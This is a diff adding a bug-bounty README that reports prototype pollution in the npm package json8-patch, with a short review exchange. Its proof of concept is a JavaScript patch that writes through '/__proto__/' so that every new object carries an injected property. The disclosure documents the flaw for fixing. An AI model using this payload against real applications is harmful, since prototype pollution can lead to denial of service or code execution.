bounties/npm/json8-patch/1/README.md

```diff
@@ -0,0 +1,33 @@
+# Description
+
+`json8-patch` is vulnerable to `Prototype Pollution`.
+This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
+
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```js
+// poc.js
+var json8Patch = require("json8-patch")
+var obj = {}
+const patch = [{op: "add", path: "/__proto__/polluted", value: "Yes! Its Polluted"}];
+console.log("Before : " + obj.polluted);
+json8Patch.apply(obj, patch);
+var obj1={}
+console.log("After : " + obj1.polluted);
```

Comment:
Replace with `console.log("After : " + {}.polluted);`

Reply:
In the above scenario, `console.log("After : " + obj1.polluted);` is same as `console.log("After : " + obj1.polluted);` since `obj1={}`